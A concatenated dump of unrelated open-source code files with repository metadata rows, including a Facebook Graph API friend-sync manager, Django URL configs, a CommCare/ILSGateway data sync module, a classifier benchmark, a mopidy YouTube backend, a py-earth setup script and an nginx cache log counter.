return error_results
facebook_auth_response = auth_response_results['facebook_auth_response']
try:
facebook_graph = facebook.GraphAPI(facebook_auth_response.facebook_access_token, version='2.7')
facebook_friends_api_details = facebook_graph.get_connections(id=facebook_auth_response.facebook_user_id,
connection_name="friends",
fields=facebook_api_fields)
# graph.get_connections returns three dictionary keys i.e. data, paging, summary,
# here data key contains list of friends with the given fields values and paging contains cursors positions
# and summary contains total_count of your friends, for ex:
# {"data": [{"name": "Micheal", "first_name": "Micheal", "id": "16086981492"},
# {"name": "John", "first_name": "John", "id": "1263984"],
# "paging": {"cursors": {"before": "QVFmc0QVBsZAk1KWmNwRVFoRzB1MGFDWlpoa3J0NFR6VTQZD",
# "after": "QVFIUlAzdGplaWV5YTZAmeUNCNzVuRk1iPZAnhUNjltUldoSjR5aWZAxdGJ2UktEUHQzNWpBeHRmcEkZD"}},
# "summary": {'total_count': 10}}
for facebook_friend_api_details_entry in facebook_friends_api_details.get('data', []):
# Extract required details for each facebook friend and then updating FacebookFriendsUsingWeVote table
facebook_friend_dict = self.extract_facebook_details_data(facebook_friend_api_details_entry)
facebook_friend_dict['facebook_user_friend_total_count'] = (
facebook_friend_api_details_entry.get('friends').get('summary').get('total_count')
if facebook_friend_api_details_entry.get('friends', {}).get('summary', {}).get('total_count', {})
else None)
if facebook_friend_dict not in facebook_friends_list:
facebook_friends_list.append(facebook_friend_dict)
facebook_friends_saved_results = self.create_or_update_facebook_friends_using_we_vote(
facebook_auth_response.facebook_user_id, facebook_friend_dict.get('facebook_user_id'))
status += ' ' + facebook_friends_saved_results['status']
if facebook_friends_api_details.get('data', []).__len__() == 0:
logger.debug("retrieve_facebook_friends_from_facebook received zero friends from the API")
success = True
status += " " + "FACEBOOK_FRIENDS_LIST_FOUND"
facebook_friends_list_found = True
except Exception as e:
success = False
status += " " + "FACEBOOK_FRIENDS_LIST_FAILED_WITH_EXCEPTION"
facebook_friends_list_found = False
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_list_found': facebook_friends_list_found,
'facebook_friends_list': facebook_friends_list,
}
return results
def retrieve_facebook_friends_using_we_vote_list(self, facebook_id_of_me):
"""
Reterive my friends facebook ids from FacebookFriendsUsingWeVote table.
:param facebook_id_of_me:
:return:
"""
status = ""
facebook_friends_using_we_vote_list = []
if not positive_value_exists(facebook_id_of_me):
success = False
status = 'RETRIEVE_FACEBOOK_FRIENDS_USING_WE_VOTE-MISSING_FACEBOOK_ID '
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_list_found': False,
'facebook_friends_using_we_vote_list': [],
}
return results
try:
facebook_friends_using_we_vote_queryset = FacebookFriendsUsingWeVote.objects.all()
facebook_friends_using_we_vote_queryset = facebook_friends_using_we_vote_queryset.filter(
facebook_id_of_me=facebook_id_of_me)
facebook_friends_using_we_vote_list = facebook_friends_using_we_vote_queryset
if len(facebook_friends_using_we_vote_list):
success = True
facebook_friends_using_we_vote_list_found = True
status += ' FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED '
else:
success = True
facebook_friends_using_we_vote_list_found = False
status += ' NO_FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED '
except FacebookFriendsUsingWeVote.DoesNotExist:
# No data found. Not a problem.
success = True
facebook_friends_using_we_vote_list_found = False
status += ' NO_FACEBOOK_FRIENDS_USING_WE_VOTE_LIST_RETRIEVED_DoesNotExist '
facebook_friends_using_we_vote_list = []
except Exception as e:
success = False
facebook_friends_using_we_vote_list_found = False
status += ' FAILED retrieve_facebook_friends_using_we_vote_list FacebookFriendsUsingWeVote '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_friends_using_we_vote_list_found': facebook_friends_using_we_vote_list_found,
'facebook_friends_using_we_vote_list': facebook_friends_using_we_vote_list,
}
return results
def extract_facebook_user_details(self, facebook_user_api_details):
"""
Extracting facebook user details with required fields
:param facebook_user_api_details:
:return:
"""
facebook_user_details_dict = {
'facebook_search_found': True
}
facebook_user_details_dict['about'] = (facebook_user_api_details.get('about')
if 'about' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['location'] = ""
if 'location' in facebook_user_api_details.keys():
if 'city' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += facebook_user_api_details.get('location').get('city')
if 'street' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += ", " + facebook_user_api_details.get('location').get('street')
if 'zip' in facebook_user_api_details.get('location'):
facebook_user_details_dict['location'] += ", " + facebook_user_api_details.get('location').get('zip')
photos = (facebook_user_api_details.get('photos').get(
'data') if 'photos' in facebook_user_api_details.keys() and facebook_user_api_details.get(
'photos', {}).get('data', []) else "")
facebook_user_details_dict['photos'] = " ".join([str(photo.get('picture'))
for photo in photos if 'picture' in photo.keys()])
facebook_user_details_dict['bio'] = (facebook_user_api_details.get('bio')
if 'bio' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['general_info'] = (facebook_user_api_details.get('general_info')
if 'general_info' in facebook_user_api_details.
keys() else "")
facebook_user_details_dict['description'] = (facebook_user_api_details.get('description')
if 'description' in facebook_user_api_details.keys()
else "")
facebook_user_details_dict['features'] = (facebook_user_api_details.get('features')
if 'features' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['contact_address'] = (facebook_user_api_details.get('contact_address')
if 'contact_address' in
facebook_user_api_details.keys() else "")
facebook_user_details_dict['emails'] = " ".join(facebook_user_api_details.get('emails')
if 'emails' in facebook_user_api_details.keys() else [])
facebook_user_details_dict['name'] = (facebook_user_api_details.get('name')
if 'name' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['mission'] = (facebook_user_api_details.get('mission')
if 'mission' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['category'] = (facebook_user_api_details.get('category')
if 'category' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['website'] = (facebook_user_api_details.get('website')
if 'website' in facebook_user_api_details.keys() else "")
facebook_user_details_dict['personal_interests'] = (facebook_user_api_details.get('personal_interests')
if 'personal_interests' in
facebook_user_api_details.keys() else "")
facebook_user_details_dict['personal_info'] = (facebook_user_api_details.get('personal_info')
if 'personal_info' in facebook_user_api_details.keys()
else "")
posts = (facebook_user_api_details.get('posts').get(
'data') if 'posts' in facebook_user_api_details.keys() and facebook_user_api_details.get(
'posts', {}).get('data', []) else "")
facebook_user_details_dict['posts'] = " ".join([str(post.get('message'))
for post in posts if 'message' in post.keys()])
return facebook_user_details_dict
def retrieve_facebook_user_details_from_facebook(self, voter_device_id, facebook_user_name):
"""
:param voter_device_id:
:param facebook_user_name:
:return:
"""
success = False
status = ''
facebook_user_details_found = False
facebook_user_details_dict = {
'facebook_search_found': facebook_user_details_found
}
facebook_api_fields = "about, location, photos{picture}, bio, general_info, description, features, " \
"contact_address, emails, posts.limit(10){message}, name, mission, category," \
"website, personal_interests, personal_info"
auth_response_results = self.retrieve_facebook_auth_response(voter_device_id)
if not auth_response_results['facebook_auth_response_found']:
error_results = {
'status': "FACEBOOK_AUTH_RESPONSE_NOT_FOUND",
'success': success,
'facebook_user_details_found': facebook_user_details_found,
'facebook_user_details': facebook_user_details_dict,
}
return error_results
facebook_auth_response = auth_response_results['facebook_auth_response']
try:
facebook_graph = facebook.GraphAPI(facebook_auth_response.facebook_access_token, version='2.7')
facebook_user_api_details = facebook_graph.get_object(id=facebook_user_name,
fields=facebook_api_fields)
facebook_user_details_dict = self.extract_facebook_user_details(facebook_user_api_details)
success = True
status += " " + "FACEBOOK_USER_DETAILS_FOUND"
facebook_user_details_found = True
except Exception as e:
success = False
status += " " + "FACEBOOK_USER_DETAILS_FAILED_WITH_EXCEPTION"
facebook_user_details_found = False
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_details_found': facebook_user_details_found,
'facebook_user_details': facebook_user_details_dict,
}
return results
def retrieve_facebook_user_by_facebook_user_id(self, facebook_user_id):
"""
Retrieve facebook user from FacebookUser table.
:param facebook_user_id:
:return:
"""
status = ""
facebook_user = FacebookUser()
try:
facebook_user = FacebookUser.objects.get(
facebook_user_id=facebook_user_id
)
success = True
facebook_user_found = True
status += ' FACEBOOK_USER_RETRIEVED '
except FacebookUser.DoesNotExist:
# No data found. Not a problem.
success = True
facebook_user_found = False
status += ' NO_FACEBOOK_USER_RETRIEVED_DoesNotExist '
except Exception as e:
success = False
facebook_user_found = False
status += ' FAILED retrieve_facebook_user FacebookUser '
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'facebook_user_found': facebook_user_found,
'facebook_user': facebook_user,
}
return results
def remove_my_facebook_entry_from_suggested_friends_list(self, facebook_suggested_friends_list, facebook_id_of_me):
"""
Facebook graph API method for friends friend return own user entry thats why removing it from
suggested friend list
:param facebook_suggested_friends_list:
:param facebook_id_of_me:
:return:
"""
for facebook_user_entry in facebook_suggested_friends_list:
if convert_to_int(facebook_user_entry['facebook_user_id']) == facebook_id_of_me:
facebook_suggested_friends_list.remove(facebook_user_entry)
return facebook_suggested_friends_list
| mit | -7,461,401,211,381,602,000 | 53.536657 | 120 | 0.582764 | false |
kenrick95/airmozilla | airmozilla/urls.py | 1 | 1959 | from django.conf import settings
from django.conf.urls import patterns, include
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import djcelery
from airmozilla.base.monkeypatches import patch
patch()
handler500 = 'airmozilla.base.views.handler500'
urlpatterns = patterns(
'',
(r'^(?P<path>contribute\.json)$', 'django.views.static.serve',
{'document_root': settings.ROOT}),
(r'^manage/', include('airmozilla.manage.urls', namespace='manage')),
(r'^requests/', include('airmozilla.suggest.urls', namespace='suggest')),
(r'^search/', include('airmozilla.search.urls', namespace='search')),
(r'^comments/', include('airmozilla.comments.urls', namespace='comments')),
(r'^starred/', include('airmozilla.starred.urls', namespace='starred')),
(r'^surveys/', include('airmozilla.surveys.urls', namespace='surveys')),
(r'^uploads/', include('airmozilla.uploads.urls', namespace='uploads')),
(r'^roku/', include('airmozilla.roku.urls', namespace='roku')),
(r'^popcorn/', include('airmozilla.popcorn.urls', namespace='popcorn')),
(r'^new/', include('airmozilla.new.urls', namespace='new')),
('^(?P<path>favicon\.ico)$', 'django.views.static.serve',
{'document_root': settings.ROOT + '/airmozilla/base/static/img'}),
(r'', include('django_browserid.urls')),
(r'', include('airmozilla.main.urls', namespace='main')),
('^pages/', include('airmozilla.staticpages.urls',
namespace='staticpages')),
)
# In DEBUG mode, serve media files through Django.
if settings.DEBUG: # pragma: no cover
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns(
'',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT
}),
)
urlpatterns += staticfiles_urlpatterns()
djcelery.setup_loader()
| bsd-3-clause | -1,065,121,520,599,024,900 | 37.411765 | 79 | 0.665646 | false |
SEL-Columbia/commcare-hq | custom/ilsgateway/commtrack.py | 1 | 12744 | import logging
import traceback
from django.contrib.auth.models import User
from corehq.apps.locations.models import Location
from corehq.apps.sms.mixin import PhoneNumberInUseException, VerifiedNumber
from corehq.apps.users.models import WebUser, CommCareUser, CouchUser, UserRole
from custom.api.utils import apply_updates
from custom.ilsgateway.api import ILSGatewayEndpoint
from corehq.apps.commtrack.models import Product, LocationType, SupplyPointCase, CommTrackUser, CommtrackConfig, \
CommtrackActionConfig
from dimagi.utils.dates import force_to_datetime
from custom.ilsgateway.models import MigrationCheckpoint
from requests.exceptions import ConnectionError
from datetime import datetime
from custom.ilsgateway.api import Location as Loc
def retry(retry_max):
def wrap(f):
def wrapped_f(*args, **kwargs):
retry_count = 0
fail = False
result = None
while retry_count < retry_max:
try:
result = f(*args, **kwargs)
fail = False
break
except Exception:
retry_count += 1
fail = True
logging.error('%d/%d tries failed' % (retry_count, retry_max))
logging.error(traceback.format_exc())
if fail:
logging.error(f.__name__ + ": number of tries exceeds limit")
logging.error("args: %s, kwargs: %s" % (args, kwargs))
return result
return wrapped_f
return wrap
@retry(5)
def sync_ilsgateway_product(domain, ilsgateway_product):
product = Product.get_by_code(domain, ilsgateway_product.sms_code)
product_dict = {
'domain': domain,
'name': ilsgateway_product.name,
'code': ilsgateway_product.sms_code,
'unit': str(ilsgateway_product.units),
'description': ilsgateway_product.description,
}
if product is None:
product = Product(**product_dict)
product.save()
else:
if apply_updates(product, product_dict):
product.save()
return product
@retry(5)
def sync_ilsgateway_webuser(domain, ilsgateway_webuser):
user = WebUser.get_by_username(ilsgateway_webuser.email.lower())
user_dict = {
'first_name': ilsgateway_webuser.first_name,
'last_name': ilsgateway_webuser.last_name,
'is_staff': ilsgateway_webuser.is_staff,
'is_active': ilsgateway_webuser.is_active,
'is_superuser': ilsgateway_webuser.is_superuser,
'last_login': force_to_datetime(ilsgateway_webuser.last_login),
'date_joined': force_to_datetime(ilsgateway_webuser.date_joined),
'password_hashed': True,
}
sp = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_webuser.location)],
reduce=False,
include_docs=True,
limit=1).first()
role_id = ilsgateway_webuser.role_id if hasattr(ilsgateway_webuser, 'role_id') else None
location_id = sp.location_id if sp else None
if user is None:
try:
user = WebUser.create(domain=None, username=ilsgateway_webuser.email.lower(),
password=ilsgateway_webuser.password, email=ilsgateway_webuser.email, **user_dict)
user.add_domain_membership(domain, role_id=role_id, location_id=location_id)
user.save()
except Exception as e:
logging.error(e)
else:
if domain not in user.get_domains():
user.add_domain_membership(domain, role_id=role_id, location_id=location_id)
user.save()
return user
def add_location(user, location_id):
commtrack_user = CommTrackUser.wrap(user.to_json())
if location_id:
loc = Location.get(location_id)
commtrack_user.clear_locations()
commtrack_user.add_location(loc, create_sp_if_missing=True)
@retry(5)
def sync_ilsgateway_smsuser(domain, ilsgateway_smsuser):
username_part = "%s%d" % (ilsgateway_smsuser.name.strip().replace(' ', '.').lower(), ilsgateway_smsuser.id)
username = "%s@%s.commcarehq.org" % (username_part, domain)
user = CouchUser.get_by_username(username)
splitted_value = ilsgateway_smsuser.name.split(' ', 1)
first_name = last_name = ''
if splitted_value:
first_name = splitted_value[0][:30]
last_name = splitted_value[1][:30] if len(splitted_value) > 1 else ''
user_dict = {
'first_name': first_name,
'last_name': last_name,
'is_active': bool(ilsgateway_smsuser.is_active),
'email': ilsgateway_smsuser.email,
'user_data': {
"role": ilsgateway_smsuser.role
}
}
if ilsgateway_smsuser.phone_numbers:
user_dict['phone_numbers'] = [ilsgateway_smsuser.phone_numbers[0].replace('+', '')]
user_dict['user_data']['backend'] = ilsgateway_smsuser.backend
sp = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_smsuser.supply_point)],
reduce=False,
include_docs=True,
limit=1).first()
location_id = sp.location_id if sp else None
if user is None and username_part:
try:
password = User.objects.make_random_password()
user = CommCareUser.create(domain=domain, username=username, password=password,
email=ilsgateway_smsuser.email, commit=False)
user.first_name = first_name
user.last_name = last_name
user.is_active = bool(ilsgateway_smsuser.is_active)
user.user_data = user_dict["user_data"]
if "phone_numbers" in user_dict:
user.set_default_phone_number(user_dict["phone_numbers"][0])
try:
user.save_verified_number(domain, user_dict["phone_numbers"][0], True, ilsgateway_smsuser.backend)
except PhoneNumberInUseException as e:
v = VerifiedNumber.by_phone(user_dict["phone_numbers"][0], include_pending=True)
v.delete()
user.save_verified_number(domain, user_dict["phone_numbers"][0], True, ilsgateway_smsuser.backend)
dm = user.get_domain_membership(domain)
dm.location_id = location_id
user.save()
add_location(user, location_id)
except Exception as e:
logging.error(e)
else:
dm = user.get_domain_membership(domain)
current_location_id = dm.location_id if dm else None
save = False
if current_location_id != location_id:
dm.location_id = location_id
add_location(user, location_id)
save = True
if apply_updates(user, user_dict) or save:
user.save()
return user
@retry(5)
def sync_ilsgateway_location(domain, endpoint, ilsgateway_location):
location = Location.view('commtrack/locations_by_code',
key=[domain, ilsgateway_location.code.lower()],
include_docs=True).first()
if not location:
if ilsgateway_location.parent:
loc_parent = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_location.parent)],
reduce=False,
include_docs=True).first()
if not loc_parent:
parent = endpoint.get_location(ilsgateway_location.parent)
loc_parent = sync_ilsgateway_location(domain, endpoint, Loc.from_json(parent))
else:
loc_parent = loc_parent.location
location = Location(parent=loc_parent)
else:
location = Location()
location.lineage = []
location.domain = domain
location.name = ilsgateway_location.name
location.metadata = {'groups': ilsgateway_location.groups}
if ilsgateway_location.latitude:
location.latitude = float(ilsgateway_location.latitude)
if ilsgateway_location.longitude:
location.longitude = float(ilsgateway_location.longitude)
location.location_type = ilsgateway_location.type
location.site_code = ilsgateway_location.code
location.external_id = str(ilsgateway_location.id)
location.save()
if not SupplyPointCase.get_by_location(location):
SupplyPointCase.create_from_location(domain, location)
else:
location_dict = {
'name': ilsgateway_location.name,
'latitude': float(ilsgateway_location.latitude) if ilsgateway_location.latitude else None,
'longitude': float(ilsgateway_location.longitude) if ilsgateway_location.longitude else None,
'type': ilsgateway_location.type,
'site_code': ilsgateway_location.code.lower(),
'external_id': str(ilsgateway_location.id),
}
case = SupplyPointCase.get_by_location(location)
if apply_updates(location, location_dict):
location.save()
if case:
case.update_from_location(location)
else:
SupplyPointCase.create_from_location(domain, location)
return location
def products_sync(domain, endpoint, **kwargs):
for product in endpoint.get_products(**kwargs):
sync_ilsgateway_product(domain, product)
def webusers_sync(project, endpoint, **kwargs):
for user in endpoint.get_webusers(**kwargs):
if user.email:
if not user.is_superuser:
setattr(user, 'role_id', UserRole.get_read_only_role_by_domain(project).get_id)
sync_ilsgateway_webuser(project, user)
def smsusers_sync(project, endpoint, **kwargs):
has_next = True
next_url = None
while has_next:
next_url_params = next_url.split('?')[1] if next_url else None
meta, users = endpoint.get_smsusers(next_url_params=next_url_params, **kwargs)
for user in users:
sync_ilsgateway_smsuser(project, user)
if not meta.get('next', False):
has_next = False
else:
next_url = meta['next']
def locations_sync(project, endpoint, **kwargs):
for location_type in ['facility', 'district', 'region']:
has_next = True
next_url = None
while has_next:
next_url_params = next_url.split('?')[1] if next_url else None
meta, locations = endpoint.get_locations(type=location_type, next_url_params=next_url_params, **kwargs)
for location in locations:
sync_ilsgateway_location(project, endpoint, location)
if not meta.get('next', False):
has_next = False
else:
next_url = meta['next']
def commtrack_settings_sync(project):
locations_types = ["MOHSW", "REGION", "DISTRICT", "FACILITY"]
config = CommtrackConfig.for_domain(project)
config.location_types = []
for i, value in enumerate(locations_types):
if not any(lt.name == value
for lt in config.location_types):
allowed_parents = [locations_types[i - 1]] if i > 0 else [""]
config.location_types.append(
LocationType(name=value, allowed_parents=allowed_parents, administrative=(value != 'FACILITY')))
actions = [action.keyword for action in config.actions]
if 'delivered' not in actions:
config.actions.append(
CommtrackActionConfig(
action='receipts',
keyword='delivered',
caption='Delivered')
)
config.save()
def bootstrap_domain(ilsgateway_config):
domain = ilsgateway_config.domain
start_date = datetime.today()
endpoint = ILSGatewayEndpoint.from_config(ilsgateway_config)
try:
checkpoint = MigrationCheckpoint.objects.get(domain=domain)
date = checkpoint.date
except MigrationCheckpoint.DoesNotExist:
checkpoint = MigrationCheckpoint()
checkpoint.domain = domain
date = None
commtrack_settings_sync(domain)
try:
products_sync(domain, endpoint, date=date)
locations_sync(domain, endpoint, date=date)
webusers_sync(domain, endpoint, date=date)
smsusers_sync(domain, endpoint, date=date)
checkpoint.date = start_date
checkpoint.save()
except ConnectionError as e:
logging.error(e) | bsd-3-clause | 4,437,364,392,095,602,000 | 39.332278 | 118 | 0.605148 | false |
arthurmensch/modl | benchmarks/log.py | 1 | 2179 | import time
import numpy as np
from lightning.impl.primal_cd import CDClassifier
from lightning.impl.sag import SAGAClassifier
from sklearn.datasets import fetch_20newsgroups_vectorized
from lightning.classification import SAGClassifier
from sklearn.linear_model import LogisticRegression
bunch = fetch_20newsgroups_vectorized(subset="all")
X = bunch.data
y = bunch.target
y[y >= 1] = 1
alpha = 1e-3
n_samples = X.shape[0]
sag = SAGClassifier(eta='auto',
loss='log',
alpha=alpha,
tol=1e-10,
max_iter=1000,
verbose=1,
random_state=0)
saga = SAGAClassifier(eta='auto',
loss='log',
alpha=alpha,
tol=1e-10,
max_iter=1000,
verbose=1,
random_state=0)
cd_classifier = CDClassifier(loss='log',
alpha=alpha / 2,
C=1 / n_samples,
tol=1e-10,
max_iter=100,
verbose=1,
random_state=0)
sklearn_sag = LogisticRegression(tol=1e-10, max_iter=1000,
verbose=2, random_state=0,
C=1. / (n_samples * alpha),
solver='sag',
penalty='l2',
fit_intercept=False)
classifiers = [{'name': 'Lightning SAG', 'estimator': sag},
{'name': 'Lightning SAGA', 'estimator': saga},
{'name': 'Sklearn SAG', 'estimator': sklearn_sag},
{'name': 'Lightning CD', 'estimator': cd_classifier},
]
start = time.time()
for classifier in classifiers:
print(classifier['name'])
clf = classifier['estimator']
clf.fit(X, y)
print("Training time", time.time() - start)
print("Accuracy", np.mean(clf.predict(X) == y))
n_nz = np.sum(np.sum(clf.coef_ != 0, axis=0, dtype=bool))
n_nz /= clf.coef_.size
print(clf.coef_)
print('Non-zero', n_nz)
| bsd-2-clause | 7,691,973,709,971,517,000 | 33.046875 | 68 | 0.490133 | false |
chatziko/mopidy-youtube | mopidy_youtube/backend.py | 1 | 5534 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import string
from multiprocessing.pool import ThreadPool
from urlparse import urlparse, parse_qs
import unicodedata
import pafy
from mopidy import backend
from mopidy.models import SearchResult, Track, Album
import pykka
import requests
from mopidy_youtube import logger
yt_api_endpoint = 'https://www.googleapis.com/youtube/v3/'
yt_key = 'AIzaSyAl1Xq9DwdE_KD4AtPaE4EJl3WZe2zCqg4'
session = requests.Session()
def resolve_track(track, stream=False):
logger.debug("Resolving Youtube for track '%s'", track)
if hasattr(track, 'uri'):
return resolve_url(track.comment, stream)
else:
return resolve_url(track.split('.')[-1], stream)
def safe_url(uri):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
safe_uri = unicodedata.normalize(
'NFKD',
unicode(uri)
).encode('ASCII', 'ignore')
return re.sub(
'\s+',
' ',
''.join(c for c in safe_uri if c in valid_chars)
).strip()
def resolve_url(url, stream=False):
try:
video = pafy.new(url)
if not stream:
uri = 'youtube:video/%s.%s' % (
safe_url(video.title), video.videoid
)
else:
uri = video.getbestaudio()
if not uri: # get video url
uri = video.getbest()
logger.debug('%s - %s %s %s' % (
video.title, uri.bitrate, uri.mediatype, uri.extension))
uri = uri.url
if not uri:
return
except Exception as e:
# Video is private or doesn't exist
logger.info(e.message)
return
track = Track(
name=video.title,
comment=video.videoid,
length=video.length * 1000,
album=Album(
name='Youtube',
images=[video.bigthumb, video.bigthumbhd]
),
uri=uri
)
return track
def search_youtube(q):
query = {
'part': 'id',
'maxResults': 15,
'type': 'video',
'q': q,
'key': yt_key
}
result = session.get(yt_api_endpoint+'search', params=query)
data = result.json()
resolve_pool = ThreadPool(processes=16)
playlist = [item['id']['videoId'] for item in data['items']]
playlist = resolve_pool.map(resolve_url, playlist)
resolve_pool.close()
return [item for item in playlist if item]
def resolve_playlist(url):
resolve_pool = ThreadPool(processes=16)
logger.info("Resolving Youtube-Playlist '%s'", url)
playlist = []
page = 'first'
while page:
params = {
'playlistId': url,
'maxResults': 50,
'key': yt_key,
'part': 'contentDetails'
}
if page and page != "first":
logger.debug("Get Youtube-Playlist '%s' page %s", url, page)
params['pageToken'] = page
result = session.get(yt_api_endpoint+'playlistItems', params=params)
data = result.json()
page = data.get('nextPageToken')
for item in data["items"]:
video_id = item['contentDetails']['videoId']
playlist.append(video_id)
playlist = resolve_pool.map(resolve_url, playlist)
resolve_pool.close()
return [item for item in playlist if item]
class YoutubeBackend(pykka.ThreadingActor, backend.Backend):
def __init__(self, config, audio):
super(YoutubeBackend, self).__init__()
self.config = config
self.library = YoutubeLibraryProvider(backend=self)
self.playback = YoutubePlaybackProvider(audio=audio, backend=self)
self.uri_schemes = ['youtube', 'yt']
class YoutubeLibraryProvider(backend.LibraryProvider):
def lookup(self, track):
if 'yt:' in track:
track = track.replace('yt:', '')
if 'youtube.com' in track:
url = urlparse(track)
req = parse_qs(url.query)
if 'list' in req:
return resolve_playlist(req.get('list')[0])
else:
return [resolve_url(track)]
else:
return [resolve_url(track)]
def search(self, query=None, uris=None, exact=False):
# TODO Support exact search
if not query:
return
if 'uri' in query:
search_query = ''.join(query['uri'])
url = urlparse(search_query)
if 'youtube.com' in url.netloc:
req = parse_qs(url.query)
if 'list' in req:
return SearchResult(
uri='youtube:search',
tracks=resolve_playlist(req.get('list')[0])
)
else:
logger.info(
"Resolving Youtube for track '%s'", search_query)
return SearchResult(
uri='youtube:search',
tracks=[resolve_url(search_query)]
)
else:
search_query = ' '.join(query.values()[0])
logger.info("Searching Youtube for query '%s'", search_query)
return SearchResult(
uri='youtube:search',
tracks=search_youtube(search_query)
)
class YoutubePlaybackProvider(backend.PlaybackProvider):
def translate_uri(self, uri):
track = resolve_track(uri, True)
if track is not None:
return track.uri
else:
return None
| apache-2.0 | 1,411,562,814,534,946,800 | 27.822917 | 76 | 0.555114 | false |
DucQuang1/py-earth | setup.py | 1 | 3348 | from setuptools import setup, Extension
import numpy
import sys
import os
sys.path.insert(0, os.path.join('.', 'pyearth'))
from _version import __version__
# Determine whether to use Cython
if '--cythonize' in sys.argv:
cythonize_switch = True
del sys.argv[sys.argv.index('--cythonize')]
else:
cythonize_switch = False
# Find all includes
local_inc = 'pyearth'
numpy_inc = numpy.get_include()
# Set up the ext_modules for Cython or not, depending
if cythonize_switch:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
ext_modules = cythonize(
[Extension(
"pyearth._util", ["pyearth/_util.pyx"], include_dirs=[numpy_inc]),
Extension(
"pyearth._basis",
["pyearth/_basis.pyx"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._record",
["pyearth/_record.pyx"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._pruning",
["pyearth/_pruning.pyx"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._forward",
["pyearth/_forward.pyx"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._types",
["pyearth/_types.pyx"],
include_dirs=[local_inc,
numpy_inc])
])
else:
ext_modules = [Extension(
"pyearth._util", ["pyearth/_util.c"], include_dirs=[numpy_inc]),
Extension(
"pyearth._basis",
["pyearth/_basis.c"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._record",
["pyearth/_record.c"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._pruning",
["pyearth/_pruning.c"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._forward",
["pyearth/_forward.c"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._types",
["pyearth/_types.c"],
include_dirs=[local_inc,
numpy_inc])
]
# Create a dictionary of arguments for setup
setup_args = {'name': 'py-earth',
'version': __version__,
'author': 'Jason Rudy',
'author_email': '[email protected]',
'packages': ['pyearth', 'pyearth.test',
'pyearth.test.basis', 'pyearth.test.record'],
'license': 'LICENSE.txt',
'description':
'A Python implementation of Jerome Friedman\'s MARS algorithm.',
'long_description': open('README.md', 'r').read(),
'py_modules': ['pyearth.earth', 'pyearth._version'],
'ext_modules': ext_modules,
'classifiers': ['Development Status :: 3 - Alpha'],
'requires': ['numpy', 'scipy'],
'install_requires': ['scikit-learn >= 0.16',
'sphinx_gallery']}
# Add the build_ext command only if cythonizing
if cythonize_switch:
setup_args['cmdclass'] = {'build_ext': build_ext}
# Finally
setup(**setup_args)
| bsd-3-clause | -5,795,489,001,214,014,000 | 32.148515 | 78 | 0.506272 | false |
biddellns/sc2league-server | config/urls.py | 1 | 1043 | """sc2league URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from sc2league_server.seasons import views as season_views
router = routers.DefaultRouter()
router.register('seasons', season_views.SeasonViewSet)
urlpatterns = [
url('^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| gpl-3.0 | -8,316,606,483,788,474,000 | 32.645161 | 82 | 0.71908 | false |
concurrentlabs/laguna | 1.0/scripts/cachequery/cache_query.py | 1 | 2571 | #!/usr/bin/python
import io
import os
import signal
import sys
from subprocess import call
hit = miss = bypass = expired = 0
#########################################################################################
#########################################################################################
def main():
try:
s = '/var/log/nginx/cache.log'
istream = io.open(s, 'r')
except IOError:
print 'ERROR: failed to open %s' % s
exit(-1)
try:
open("/var/run/cache_query.pid","wb").write('%d' % os.getpid())
except IOError:
print 'ERROR: failed to open %s' % s
exit(-1)
signal.signal(signal.SIGINT, reset_stats)
global hit, miss, bypass, expired
istream.seek(0, 2)
banner()
print_stat_line()
while 1:
for s in istream.readlines():
l = s.split(' ')
if l[2] == 'HIT':
hit += 1
print_stat_line()
elif l[2] == 'MISS':
miss += 1
print_stat_line()
elif l[2] == 'BYPASS':
bypass += 1
print_stat_line()
elif l[2] == 'EXPIRED':
expired += 1
print_stat_line()
### ??? ###
# expired = 0
exit(0)
#########################################################################################
# reset stats
#########################################################################################
def reset_stats(sig, stack):
# print "reset_stats fired."
global hit, miss, bypass, expired
hit = miss = bypass = expired = 0
banner()
print_stat_line()
return
#########################################################################################
#########################################################################################
